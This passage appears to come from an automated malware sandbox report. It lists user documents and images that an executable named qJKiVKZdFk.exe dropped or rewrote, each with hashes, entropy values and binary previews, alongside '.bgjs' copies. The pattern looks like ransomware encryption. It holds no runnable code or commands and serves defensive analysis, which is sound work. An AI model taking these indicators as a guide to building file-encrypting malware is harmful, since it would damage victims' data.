                                                                                                                                      Entropy (8bit):7.835773102973665
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BvascoV51sA4eByGCHqlDh3P/mOlm5tuA+SeLVN504Y8jEwm9bD:kscoVbsAvBynKlDhVlmtuVLrG4bQwm9D
                                                                                                                                      MD5:B982309BD0CECD756616959C586C50DA
                                                                                                                                      SHA1:73DDEE3185B598ABC3688BFB29688825378F2DE7
                                                                                                                                      SHA-256:9E71A8D7506543269F4E43FDF65B52B9CAB726796E1703ADBCE0C7061735C89A
                                                                                                                                      SHA-512:FC138A926BBA39607301C307E4DB64FE26F38E1A5C951D4CF6911289C8F1D6B05A779959E36AB9EB6589B2E76FE48A1D0CA2384369DD07F4385FCB7AD36D0C2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMPi`...:.l..y.'..("...=.3..m......g....$.9.T...khk1K_..5../.......t....6....N..o....`...d.M....;.*\u.d.;...........A...*.......X..z..\E...,%U.....D^4......."\OX.........t.T.F..-.H.....;Q.....VW...Pm.!...ws....u.6..... .pHV.U.?=.R...d...1M...vS...L......l..:G..5|b.^....2 ..3i.A.M....a..w...h..j..........o.fLS.2....ao..c..... .HI..b5`.B...k....R9.....r..'+...X..:..M..5k....B..3..6p.-.....p........{."..)..M(..b........[,o.#.U.....T.O.^K...'..C..A.U;.0.......-.aX..x:.s.F.I.Cxo{...r......3..i.J..X..W..O.v..Sw.....-].....6..t..|(O2...&...\Q).h......>p..........C.c..^.8..J.w.2...L....K...lq........Y.x.,.....,%.E }y. ...t.4M..2..z$.m..Q.~....:d.?.`8..%.I...{.<'.+...2w..;........+B..8l:&].hT.s\.0.O%.......J...DL...ub..k..7...R.....l.._~....@,.;.s.....).....R...S.-'?..r.e.Ih..^...J......=y..C....=`h.s..Ij.K8.:....A...lb...Mq.K.v..v7..1.|@R|...J{....!}..h...wZ.:..<. .D....[..jow....1..B..ed....7........T......r..}!....0..................a~:

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.835773102973665
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BvascoV51sA4eByGCHqlDh3P/mOlm5tuA+SeLVN504Y8jEwm9bD:kscoVbsAvBynKlDhVlmtuVLrG4bQwm9D
                                                                                                                                      MD5:B982309BD0CECD756616959C586C50DA
                                                                                                                                      SHA1:73DDEE3185B598ABC3688BFB29688825378F2DE7
                                                                                                                                      SHA-256:9E71A8D7506543269F4E43FDF65B52B9CAB726796E1703ADBCE0C7061735C89A
                                                                                                                                      SHA-512:FC138A926BBA39607301C307E4DB64FE26F38E1A5C951D4CF6911289C8F1D6B05A779959E36AB9EB6589B2E76FE48A1D0CA2384369DD07F4385FCB7AD36D0C2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMPi`...:.l..y.'..("...=.3..m......g....$.9.T...khk1K_..5../.......t....6....N..o....`...d.M....;.*\u.d.;...........A...*.......X..z..\E...,%U.....D^4......."\OX.........t.T.F..-.H.....;Q.....VW...Pm.!...ws....u.6..... .pHV.U.?=.R...d...1M...vS...L......l..:G..5|b.^....2 ..3i.A.M....a..w...h..j..........o.fLS.2....ao..c..... .HI..b5`.B...k....R9.....r..'+...X..:..M..5k....B..3..6p.-.....p........{."..)..M(..b........[,o.#.U.....T.O.^K...'..C..A.U;.0.......-.aX..x:.s.F.I.Cxo{...r......3..i.J..X..W..O.v..Sw.....-].....6..t..|(O2...&...\Q).h......>p..........C.c..^.8..J.w.2...L....K...lq........Y.x.,.....,%.E }y. ...t.4M..2..z$.m..Q.~....:d.?.`8..%.I...{.<'.+...2w..;........+B..8l:&].hT.s\.0.O%.......J...DL...ub..k..7...R.....l.._~....@,.;.s.....).....R...S.-'?..r.e.Ih..^...J......=y..C....=`h.s..Ij.K8.:....A...lb...Mq.K.v..v7..1.|@R|...J{....!}..h...wZ.:..<. .D....[..jow....1..B..ed....7........T......r..}!....0..................a~:

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.842878624445136
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PKf7OIZqOIbxqC7egFQ9bJq2b9o+d2abydpxeduXa77JD9rvvXGthImm0RNxzYgv:if+OjC7NFQ90iByd0jrvXGt2mm0RNWdW
                                                                                                                                      MD5:A7A7CC92CB5D8A4184CCA76E164851ED
                                                                                                                                      SHA1:D6C6D712B8FBBDA81F76675EC5F14BDF30BC0AFB
                                                                                                                                      SHA-256:4683214BB39C3D0DF64C730CE95779720F117CEC89CB661AEFC26C656CD0A0C6
                                                                                                                                      SHA-512:3E301A81209269A286394FEE83A19951272603855524E8D904C32C69BA242AA33495FA870BCAB28D0615A505FCF0A06DEDCEC527C8BD727E2549F9EB4E5C60F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP,s.!_..AI.$..m.Z.h.@K.3..i.K.B..d.Q.......=....F..{.f...jx..Km...dc.y...f>..(w/.j}.....\.b.. `....8.q.e..Q.H..A.#.{6..P.g..G...Ls.=v@...N?V].....ki..qG...|.F?.q....9......8r..R...Z...#L..H..(w<...e.....q.3.."...FB...3..K..Z..... ..'.b....r...i.BY....d..5.m.6.D.(aZ;.i..g?xO..XV#u.2.v....%.1g........`W.c.f..}...Zk...n....)(.IrO.C]d^.A.7.... ^._.2}........!b}.....Wm..U..L.A%.@O.{...lu....io.u..g........";.R/E+.....q....5d.>....5+...-...%6j.....*..`>.........e..h..a...:bJ...X....../r._h.."?....V..;...`.b\.d..N..2f.Y.]$f.......k..h......W.$........wkh.$..qRNNY!U,0.K,.....{.-gZ.irEq.3.{]e..0.....7.........g=..a.;fj..^.m.?.xn.a%.7H.....y....{..,.|.e...X3.@....3-.\..In..*v...@&...2....t..X.mq.A..*...OF..Z.{..!Uc;:...L.&.J-.q...+m..R.!....W.%..SE.].'l..$~..W.`z...[.o...w.r..?...].,.].A..-.f.x.sD4q...D...........}.]..-..u.....4#.BCYX....R.$....l.{.U.?;j=.....m..i...0l..o..p.I..K#5Y..~r..[r@......V^..A..a..nb.....9....O........)X..?W.>..

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.842878624445136
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PKf7OIZqOIbxqC7egFQ9bJq2b9o+d2abydpxeduXa77JD9rvvXGthImm0RNxzYgv:if+OjC7NFQ90iByd0jrvXGt2mm0RNWdW
                                                                                                                                      MD5:A7A7CC92CB5D8A4184CCA76E164851ED
                                                                                                                                      SHA1:D6C6D712B8FBBDA81F76675EC5F14BDF30BC0AFB
                                                                                                                                      SHA-256:4683214BB39C3D0DF64C730CE95779720F117CEC89CB661AEFC26C656CD0A0C6
                                                                                                                                      SHA-512:3E301A81209269A286394FEE83A19951272603855524E8D904C32C69BA242AA33495FA870BCAB28D0615A505FCF0A06DEDCEC527C8BD727E2549F9EB4E5C60F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP,s.!_..AI.$..m.Z.h.@K.3..i.K.B..d.Q.......=....F..{.f...jx..Km...dc.y...f>..(w/.j}.....\.b.. `....8.q.e..Q.H..A.#.{6..P.g..G...Ls.=v@...N?V].....ki..qG...|.F?.q....9......8r..R...Z...#L..H..(w<...e.....q.3.."...FB...3..K..Z..... ..'.b....r...i.BY....d..5.m.6.D.(aZ;.i..g?xO..XV#u.2.v....%.1g........`W.c.f..}...Zk...n....)(.IrO.C]d^.A.7.... ^._.2}........!b}.....Wm..U..L.A%.@O.{...lu....io.u..g........";.R/E+.....q....5d.>....5+...-...%6j.....*..`>.........e..h..a...:bJ...X....../r._h.."?....V..;...`.b\.d..N..2f.Y.]$f.......k..h......W.$........wkh.$..qRNNY!U,0.K,.....{.-gZ.irEq.3.{]e..0.....7.........g=..a.;fj..^.m.?.xn.a%.7H.....y....{..,.|.e...X3.@....3-.\..In..*v...@&...2....t..X.mq.A..*...OF..Z.{..!Uc;:...L.&.J-.q...+m..R.!....W.%..SE.].'l..$~..W.`z...[.o...w.r..?...].,.].A..-.f.x.sD4q...D...........}.]..-..u.....4#.BCYX....R.$....l.{.U.?;j=.....m..i...0l..o..p.I..K#5Y..~r..[r@......V^..A..a..nb.....9....O........)X..?W.>..

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\GLTYDMDUST.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848127465577831
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Hkz2ZEl4OgDP+ZruqNVwFZs+z7ek5nD8ypMqpWs7JM2enhHocBxiyrbD:m4O4P+VuoVwr7DD8AMhs7JahHoctD
                                                                                                                                      MD5:86EED0DAEF92F6156A62FAA948BBB6BB
                                                                                                                                      SHA1:50BDA5CC491687D09673EBDB6D23A64DBE276E48
                                                                                                                                      SHA-256:5B8BBA79607E4FB061BC3E5B32C6143C42FCE906D0ECF6CA2D36D297245D7CED
                                                                                                                                      SHA-512:1DD97567E7DF9965E27E255A7B409C971A112A12BD67FF0B850F67CCF768F19DC6F6FC792D23DA2EEFEF32C208B6803830F13DFFBD7BBDFAAD6FD429BB78574E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYDBY.4....@3.c.9aU)1C.#.7.s..6..0].Z..>.]R0..Q..&.f.&.k...[uo....-.x...h,@._.....V.>Ux.u.R...D.....S.[.-T..?M........Y'..V......t?....;B........{.B4?......S.m.~.^.}.Q'l...-bH.G...@..i.w;JG~..s......k.....l.[:..G...?.Q7.}:.:~^r&z......?.C.`.....a...d[...%.-+s......|.&.%!..8.....c........Fg..[....1W...K...\.........R......~...#J............,..p.a..6.J.s....e.F.S.k..........U..m..Z..u...&.s.^S...a...Y.W..3.2..d.c...M.GK....[....5.g.e>\......GN..E@.N6Q.;S._=....?...!.K.....}/...W.NIrk`osT;.....9..^^.W./(......1':.f.G@'881.4#*..eE.[.s=Q..CO......|.z...D.4{lT}..&4.....)4.r...%.i.r....+.F.[...HG:o..R&<....,.u..U.&/|...Ma.Ib.LB.zg.._..n...tf..s......(D..T.3k..s...L[.l..Q[..}..*.bc>pT.......K]...(B.F.g...Ei.8.K.}_..F....k.Lu..-..i..59..}Q.+.{..mP. =.H.Kz...-..........2b.-.kJ.v8.T@.{HB*..}.{=.{.so......X.m.3L.n....p29..Fz.Qx^..a...@..`.|w......h.r.b7.U.....:~R~..2.0...........z..{.@..J8....0...Zn.VFq2...E...o.. .R.J...h.......

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\GLTYDMDUST.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848127465577831
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Hkz2ZEl4OgDP+ZruqNVwFZs+z7ek5nD8ypMqpWs7JM2enhHocBxiyrbD:m4O4P+VuoVwr7DD8AMhs7JahHoctD
                                                                                                                                      MD5:86EED0DAEF92F6156A62FAA948BBB6BB
                                                                                                                                      SHA1:50BDA5CC491687D09673EBDB6D23A64DBE276E48
                                                                                                                                      SHA-256:5B8BBA79607E4FB061BC3E5B32C6143C42FCE906D0ECF6CA2D36D297245D7CED
                                                                                                                                      SHA-512:1DD97567E7DF9965E27E255A7B409C971A112A12BD67FF0B850F67CCF768F19DC6F6FC792D23DA2EEFEF32C208B6803830F13DFFBD7BBDFAAD6FD429BB78574E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYDBY.4....@3.c.9aU)1C.#.7.s..6..0].Z..>.]R0..Q..&.f.&.k...[uo....-.x...h,@._.....V.>Ux.u.R...D.....S.[.-T..?M........Y'..V......t?....;B........{.B4?......S.m.~.^.}.Q'l...-bH.G...@..i.w;JG~..s......k.....l.[:..G...?.Q7.}:.:~^r&z......?.C.`.....a...d[...%.-+s......|.&.%!..8.....c........Fg..[....1W...K...\.........R......~...#J............,..p.a..6.J.s....e.F.S.k..........U..m..Z..u...&.s.^S...a...Y.W..3.2..d.c...M.GK....[....5.g.e>\......GN..E@.N6Q.;S._=....?...!.K.....}/...W.NIrk`osT;.....9..^^.W./(......1':.f.G@'881.4#*..eE.[.s=Q..CO......|.z...D.4{lT}..&4.....)4.r...%.i.r....+.F.[...HG:o..R&<....,.u..U.&/|...Ma.Ib.LB.zg.._..n...tf..s......(D..T.3k..s...L[.l..Q[..}..*.bc>pT.......K]...(B.F.g...Ei.8.K.}_..F....k.Lu..-..i..59..}Q.+.{..mP. =.H.Kz...-..........2b.-.kJ.v8.T@.{HB*..}.{=.{.so......X.m.3L.n....p29..Fz.Qx^..a...@..`.|w......h.r.b7.U.....:~R~..2.0...........z..{.@..J8....0...Zn.VFq2...E...o.. .R.J...h.......

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\HMPPSXQPQV.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8530766808349375
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:nsaFFwDG2oOUcSfrHxGLvmOkErD3NDHWSQrntwAHdTeq/w1dmhYL8YbD:nsaFFpNTFfrRmxD2HKoRw1d8CD
                                                                                                                                      MD5:91BB026F170956C1A944568C4F49813A
                                                                                                                                      SHA1:BA4BF68B6AC62AD9EFDB51D0B5EB98FA139C186D
                                                                                                                                      SHA-256:0D6E4FC4625A90AE87437B5F5EA64DC2853EDBA386B10BF3ADF7EB2735CFCF8D
                                                                                                                                      SHA-512:716E3149F061342380D7AC01AF151A74F0699E3EDB17AA85A81B9CB0206AE34D75C6A226071369FF9513D9294C3AB084FD76BD8F22BEAB07F628BBA49BAA9B32
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS..w...v.wh.U....K.=.8.$5;t.~......\ju.....x.<..2...m..rR\4z.....4.J....x&...)..A..C.m5.!....v[..>^.oA.4.!...&{.L.l......|.0.rZ...._^.A...'.i4.).."m...>$..(.{..1.z._..<$e^...`.-#^...r......I..62.bB.O.oOfo...[...n.[S...@-...F|<.mO.. b....Y.....z.N..W$A.>n.X"3Ih.....4.,0a..MZ'..7.2{.}c.(.....\....../@...v.z..p}....c..AT..TK0...<Iq..5....QO......;Q6r.Z..^....|.~.w.h.y..$.....7.@..LR$.'..@,p..Q.X....:d...F..N0(..{...,..~4...G...LO...]9.Z>.O..\#.z..q.$..H.s^uZ..J.1t...m....>.....K......m..=.J.|.U.l.......'K.|pt........6.......\.....z]......K.9.yu..(S..%............i=..Y^.i.F ...5'.\u........B. ..|.I.]D..D..,..o7...........g.l...O<.v.D.M.70.....0...oy(......i).)....<..G.)..m.."s.r....S .`'.......c{M.gx.,......eH.._O....Y\.9..\..v...O..cY....n..*r...........(Rr..C....\.f.....B.V.)..Xr.5.IR.pq.I....5:te.k1..l.....|...`..98.y.O.Ly.hu.g......wg.Y!c.Q..1..L.......}._.....U.N..R...#...V.@..d..t..q0z.a.8.S.F..ZK......4F.aR.."k.w..'....+...

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\HMPPSXQPQV.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8530766808349375
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:nsaFFwDG2oOUcSfrHxGLvmOkErD3NDHWSQrntwAHdTeq/w1dmhYL8YbD:nsaFFpNTFfrRmxD2HKoRw1d8CD
                                                                                                                                      MD5:91BB026F170956C1A944568C4F49813A
                                                                                                                                      SHA1:BA4BF68B6AC62AD9EFDB51D0B5EB98FA139C186D
                                                                                                                                      SHA-256:0D6E4FC4625A90AE87437B5F5EA64DC2853EDBA386B10BF3ADF7EB2735CFCF8D
                                                                                                                                      SHA-512:716E3149F061342380D7AC01AF151A74F0699E3EDB17AA85A81B9CB0206AE34D75C6A226071369FF9513D9294C3AB084FD76BD8F22BEAB07F628BBA49BAA9B32
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS..w...v.wh.U....K.=.8.$5;t.~......\ju.....x.<..2...m..rR\4z.....4.J....x&...)..A..C.m5.!....v[..>^.oA.4.!...&{.L.l......|.0.rZ...._^.A...'.i4.).."m...>$..(.{..1.z._..<$e^...`.-#^...r......I..62.bB.O.oOfo...[...n.[S...@-...F|<.mO.. b....Y.....z.N..W$A.>n.X"3Ih.....4.,0a..MZ'..7.2{.}c.(.....\....../@...v.z..p}....c..AT..TK0...<Iq..5....QO......;Q6r.Z..^....|.~.w.h.y..$.....7.@..LR$.'..@,p..Q.X....:d...F..N0(..{...,..~4...G...LO...]9.Z>.O..\#.z..q.$..H.s^uZ..J.1t...m....>.....K......m..=.J.|.U.l.......'K.|pt........6.......\.....z]......K.9.yu..(S..%............i=..Y^.i.F ...5'.\u........B. ..|.I.]D..D..,..o7...........g.l...O<.v.D.M.70.....0...oy(......i).)....<..G.)..m.."s.r....S .`'.......c{M.gx.,......eH.._O....Y\.9..\..v...O..cY....n..*r...........(Rr..C....\.f.....B.V.)..Xr.5.IR.pq.I....5:te.k1..l.....|...`..98.y.O.Ly.hu.g......wg.Y!c.Q..1..L.......}._.....U.N..R...#...V.@..d..t..q0z.a.8.S.F..ZK......4F.aR.."k.w..'....+...

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\LFOPODGVOH.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848146506966937
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xWnq1FG3Z7cI8h7JDVy9lAMRF0waxOi4xei/mfnLwUM/xNZfYi0ewbD:xWnqO1cIM7NVyry4xzc8WeqD
                                                                                                                                      MD5:B2E3EA03D9EEAB69A36CF4A128A0C97D
                                                                                                                                      SHA1:794DC6F0113F1D56E8B71C4EC5063961C2E4BE37
                                                                                                                                      SHA-256:4640A6449D83A78D51727448229C91142CD8944E2B32CADC15494448BD3F9205
                                                                                                                                      SHA-512:8EBF83A53CC70D2904899C01B1F60AEC8281AE46DC5C3E9021391FD86B8D431984F9D79839AB57AB475EEC907A43D307F3D6A6DEEAA4332CE10323B6B00B128A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPOyQ+-a-.AE...< .zx{g.C..c....O<k..5..?...s..........0.V&.5.1M..9.2.Mqm.[.`C.......0..d......&2.rn.r..;\&|.=v..Q..@>T..w...o...'.. ....v..J.+..Ul.Y.$G.wE?.9&.b..?,.\.F..U.+.I...a.. T/2...L...>...s...C.-........-J0....O.Q....QL...A.d.S.Bl5t(|....n,......W..)..}x.(..N... ...8.{...t......&..}..~..M>|/.|.....P..iR...O.MP.iP....[n.k|i...\.....wM......Y....,>4.......wh..u.)..a.Z......[/.'.?}l..;=.>HZq....i.d..(..GW.k}..v....`..u1..{.Y~:q..l.."...~.....G...../.l..(.`....!..^k..".U.k.....*.^.M.b.u..(T,.~..9.B..%..J..l../.H.jp.X...?##\X....J..!S..;.M.Qx...tY-..H..H.!......Q(%.C...p.^.@4..>.R1J....4.2Wp....{n./..g.~d............p.`&...:^.rK..>.`...nS............^...V..QaS.....B.VWA.`.E......,......?EV.U..ZI[sB.z(..........h|..#..;.,4:.R......].NF.....|.....3d..!..:.*.e.Z.S.DAJ..gk.}S[.i^.}`......}..m6../uU2..c'.V.....~~. P...."..EHI....1.....r~.....W.>...J...<.aS..;.....Mf...+....Z......*....<....C.7z..@....N..O.qH...9...m..4L..2f..7(Y.[k..D

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\LFOPODGVOH.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848146506966937
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xWnq1FG3Z7cI8h7JDVy9lAMRF0waxOi4xei/mfnLwUM/xNZfYi0ewbD:xWnqO1cIM7NVyry4xzc8WeqD
                                                                                                                                      MD5:B2E3EA03D9EEAB69A36CF4A128A0C97D
                                                                                                                                      SHA1:794DC6F0113F1D56E8B71C4EC5063961C2E4BE37
                                                                                                                                      SHA-256:4640A6449D83A78D51727448229C91142CD8944E2B32CADC15494448BD3F9205
                                                                                                                                      SHA-512:8EBF83A53CC70D2904899C01B1F60AEC8281AE46DC5C3E9021391FD86B8D431984F9D79839AB57AB475EEC907A43D307F3D6A6DEEAA4332CE10323B6B00B128A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPOyQ+-a-.AE...< .zx{g.C..c....O<k..5..?...s..........0.V&.5.1M..9.2.Mqm.[.`C.......0..d......&2.rn.r..;\&|.=v..Q..@>T..w...o...'.. ....v..J.+..Ul.Y.$G.wE?.9&.b..?,.\.F..U.+.I...a.. T/2...L...>...s...C.-........-J0....O.Q....QL...A.d.S.Bl5t(|....n,......W..)..}x.(..N... ...8.{...t......&..}..~..M>|/.|.....P..iR...O.MP.iP....[n.k|i...\.....wM......Y....,>4.......wh..u.)..a.Z......[/.'.?}l..;=.>HZq....i.d..(..GW.k}..v....`..u1..{.Y~:q..l.."...~.....G...../.l..(.`....!..^k..".U.k.....*.^.M.b.u..(T,.~..9.B..%..J..l../.H.jp.X...?##\X....J..!S..;.M.Qx...tY-..H..H.!......Q(%.C...p.^.@4..>.R1J....4.2Wp....{n./..g.~d............p.`&...:^.rK..>.`...nS............^...V..QaS.....B.VWA.`.E......,......?EV.U..ZI[sB.z(..........h|..#..;.,4:.R......].NF.....|.....3d..!..:.*.e.Z.S.DAJ..gk.}S[.i^.}`......}..m6../uU2..c'.V.....~~. P...."..EHI....1.....r~.....W.>...J...<.aS..;.....Mf...+....Z......*....<....C.7z..@....N..O.qH...9...m..4L..2f..7(Y.[k..D

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\NWCXBPIUYI.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.85070678179289
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2ZbKuhG4Bn3uRf5WHPmPMf99r/QHRpKkEKPZ9TKhX2i5LZmy+aRbD:mbLbn2f55PMrr/QxYeZVs5t8aBD
                                                                                                                                      MD5:E3B177E794AEDCF58990818E686D3811
                                                                                                                                      SHA1:08E7D7F1E5ABA389DA682B0C6ED8A8B7104F8014
                                                                                                                                      SHA-256:FA76FFDACB00CE4C29F2B3CF488D49BCF63439885180245ECE971EDB15524057
                                                                                                                                      SHA-512:A2DF16CA4019A803403CBE323180032BEEF89E173CD9EC8A005F4640972822BD13FA5F47E9BD1664913CDEB79A4846FF286C03940E2C7CDC6ABA6E28C0EC8B1B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXBn8.'.pg.d<:.@.=.r..;.'..4~..fZ|.........."H.o.'...S?..P.C..1zU..I4vA`$.huM.>.....e..*y)......_..=.!@g..T~.&F-*... ..O..oi\._J..../,..I..o.z.|... k\f0..2....;'@i..I....D.oS..IO..|.*,./..<...GV.+...!)..(.~qU.....ZB.a./E..*...H.R..@].!.a" l.So.J.#.`...B]..p.r.-..cf.~.:^e.I[...x..v..3l......V..[.w..........-......W.z.4..Ed._.u.V...C{).#.nH...8......!...'.:.`2..+..j.-.r....._..(..H...CN....+....v...../%.(HxTn...y.b.#.7J~.1.i.3...-..(...~t.4...H(E.m1..). B&..a..3...?.H.".."@5|A."-.s.2.k....M.xFA...v.....r..e.........j.>r.O.#_....V..h.hj...}R'&....r.].Ni!..`...R.P.({..$..z*i.t...,..f....T.X.. ..$;...;.TTO..H..)..+.0&.t+.;..P..T.{.......U......b...W...G.}YL.q..$.#.L.t..I...h.U3..t...9.. ..O..g....@..|. ..8.N.sW]z.W.(.O"..x.Uk..F..Zj..:,..x...@{..../.5.f-(.t1.6.{..IE.G...G$!;$.9%...G.....p8.L....."...=.4~..D.....B.....r(.~.I....m....y...N....!!.pK......NI.Hp...<s.........k)O_.`.....B.......U:.p.[.x@l9+8.?RV;.j..........UD.e..r.d.v...`.'....l^..XkcL.s.e

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\NWCXBPIUYI.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.85070678179289
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2ZbKuhG4Bn3uRf5WHPmPMf99r/QHRpKkEKPZ9TKhX2i5LZmy+aRbD:mbLbn2f55PMrr/QxYeZVs5t8aBD
                                                                                                                                      MD5:E3B177E794AEDCF58990818E686D3811
                                                                                                                                      SHA1:08E7D7F1E5ABA389DA682B0C6ED8A8B7104F8014
                                                                                                                                      SHA-256:FA76FFDACB00CE4C29F2B3CF488D49BCF63439885180245ECE971EDB15524057
                                                                                                                                      SHA-512:A2DF16CA4019A803403CBE323180032BEEF89E173CD9EC8A005F4640972822BD13FA5F47E9BD1664913CDEB79A4846FF286C03940E2C7CDC6ABA6E28C0EC8B1B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXBn8.'.pg.d<:.@.=.r..;.'..4~..fZ|.........."H.o.'...S?..P.C..1zU..I4vA`$.huM.>.....e..*y)......_..=.!@g..T~.&F-*... ..O..oi\._J..../,..I..o.z.|... k\f0..2....;'@i..I....D.oS..IO..|.*,./..<...GV.+...!)..(.~qU.....ZB.a./E..*...H.R..@].!.a" l.So.J.#.`...B]..p.r.-..cf.~.:^e.I[...x..v..3l......V..[.w..........-......W.z.4..Ed._.u.V...C{).#.nH...8......!...'.:.`2..+..j.-.r....._..(..H...CN....+....v...../%.(HxTn...y.b.#.7J~.1.i.3...-..(...~t.4...H(E.m1..). B&..a..3...?.H.".."@5|A."-.s.2.k....M.xFA...v.....r..e.........j.>r.O.#_....V..h.hj...}R'&....r.].Ni!..`...R.P.({..$..z*i.t...,..f....T.X.. ..$;...;.TTO..H..)..+.0&.t+.;..P..T.{.......U......b...W...G.}YL.q..$.#.L.t..I...h.U3..t...9.. ..O..g....@..|. ..8.N.sW]z.W.(.O"..x.Uk..F..Zj..:,..x...@{..../.5.f-(.t1.6.{..IE.G...G$!;$.9%...G.....p8.L....."...=.4~..D.....B.....r(.~.I....m....y...N....!!.pK......NI.Hp...<s.........k)O_.`.....B.......U:.p.[.x@l9+8.?RV;.j..........UD.e..r.d.v...`.'....l^..XkcL.s.e

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\NYMMPCEIMA.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.85056738515735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:U1uWn3BixMLUohT9urAJFXnKhfJIfdiwajWAvbAXtH9SIXNE64SuSzAbD:U1ufyU8JUCXnKhfu8JjzAXtHkCNF4dSu
                                                                                                                                      MD5:E7AC3939C07EDB8F30582AFA802A65CE
                                                                                                                                      SHA1:CB846EFD1DFE7EB774D797530C0DA3F4B593AB04
                                                                                                                                      SHA-256:22CF37A342D439BD0610814BED7E2F4418EF45700BBC3C30AEDEC38CCF2A8D7F
                                                                                                                                      SHA-512:5E72C9F7A7D04CFE8DE66C5FFEBF2D8CCEC86ADEEA13423DAC101D80520B1F6FD5CB4DAF548999D0157BFB648EE749EABBA63C1608042D8A2E045BB2D2EA772A
                                                                                                                                      Malicious:false
